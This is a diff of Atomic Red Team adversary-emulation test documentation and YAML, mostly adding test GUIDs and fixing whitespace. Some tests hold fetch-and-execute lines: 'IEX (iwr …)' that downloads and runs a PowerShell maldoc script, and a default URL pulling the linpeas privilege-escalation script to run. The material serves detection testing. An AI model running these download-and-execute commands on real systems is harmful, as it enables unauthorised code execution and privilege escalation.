 ##### Get Prereq Commands:
 ```powershell
@@ -476,10 +528,14 @@ Upon execution, network test info and 'T1086 PowerShell Session Creation and Use
 **Supported Platforms:** Windows


+**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hostname_to_connect | The host to connect to, by default it will connect to the local machine | String | $env:COMPUTERNAME|

@@ -508,7 +564,7 @@ Try {
 } 
 Catch {
    exit 1
-} 
+}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -527,10 +583,14 @@ Executes powershell.exe with variations of the -Command parameter
 **Supported Platforms:** Windows


+**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | command_param_variation | The "Command" parameter variation to use | String | C|
@@ -552,7 +612,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -571,10 +631,14 @@ Executes powershell.exe with variations of the -Command parameter with encoded a
 **Supported Platforms:** Windows


+**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | command_param_variation | The "Command" parameter variation to use | String | C|
@@ -597,7 +661,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -616,10 +680,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter
 **Supported Platforms:** Windows


+**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
@@ -641,7 +709,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -660,10 +728,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter with en
 **Supported Platforms:** Windows


+**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
@@ -686,7 +758,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -24,6 +24,10 @@ Reference: https://github.com/EmpireProject/Empire
 **Supported Platforms:** macOS


+**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2
+
+
+



@@ -21,10 +21,14 @@ Creates and executes a simple batch script. Upon execution, CMD will briefly lau
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | Command to execute within script. | string | dir|
 | script_path | Script path. | path | $env:TEMP&#92;T1059.003_script.bat|
@@ -48,7 +52,7 @@ Remove-Item #{script_path} -Force -ErrorAction Ignore
 ##### Description: Batch file must exist on disk at specified location (#{script_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{script_path}) {exit 0} else {exit 1} 
+if (Test-Path #{script_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -68,10 +72,14 @@ Writes text to a file and display the results. This test is intended to emulate
 **Supported Platforms:** Windows


+**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%&#92;test.bin|
 | message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!|
@@ -21,10 +21,14 @@ Creates and executes a simple bash script.
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Script path | path | /tmp/art.sh|

@@ -59,6 +63,10 @@ Upon successful execution, sh will download via curl and wget the specified payl
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
+
+
+



@@ -25,10 +25,14 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
 **Supported Platforms:** Windows


+**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1059.005&#92;src&#92;sys_info.vbs|

@@ -52,7 +56,7 @@ Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ##### Description: Sample script must exist on disk at specified location (#{vbscript})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{vbscript}) {exit 0} else {exit 1} 
+if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -77,6 +81,10 @@ You can validate this by opening WinWord -> File -> Account -> About Word
 **Supported Platforms:** Windows


+**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+
+
+



@@ -84,7 +92,8 @@ You can validate this by opening WinWord -> File -> Account -> About Word


 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
 ```

@@ -104,7 +113,7 @@ try {
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -125,10 +134,14 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
 **Supported Platforms:** Windows


+**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|

@@ -137,7 +150,8 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b


 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
 ```

@@ -157,7 +171,7 @@ try {
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -54,7 +54,8 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
  executor:
    command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
    cleanup_command: |
      Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -88,8 +89,9 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
    cleanup_command: |
      Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
-    name: powershell
+    name: powershell
@@ -21,10 +21,14 @@ Download and execute shell script and write to file then execute locally using P
 **Supported Platforms:** Linux


+**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
 | payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
@@ -51,7 +55,7 @@ rm #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -70,10 +74,14 @@ Create Python file (.py) that downloads and executes shell script via executor a
 **Supported Platforms:** Linux


+**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Python script name | Path | T1059.006.py|
 | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -111,7 +119,7 @@ rm #{python_script_name} #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -130,10 +138,14 @@ Create Python file (.py) then compile to binary (.pyc) that downloads an externa
 **Supported Platforms:** Linux


+**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Name of Python script name | Path | T1059.006.py|
 | script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -173,7 +185,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -21,6 +21,10 @@ Permission Groups Discovery
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
+
+
+



@@ -48,6 +52,10 @@ information will be displayed.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
+
+
+



@@ -74,6 +82,10 @@ information will be displayed.
 **Supported Platforms:** Windows


+**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
+
+
+



--- a/Show More
+++ b/Show More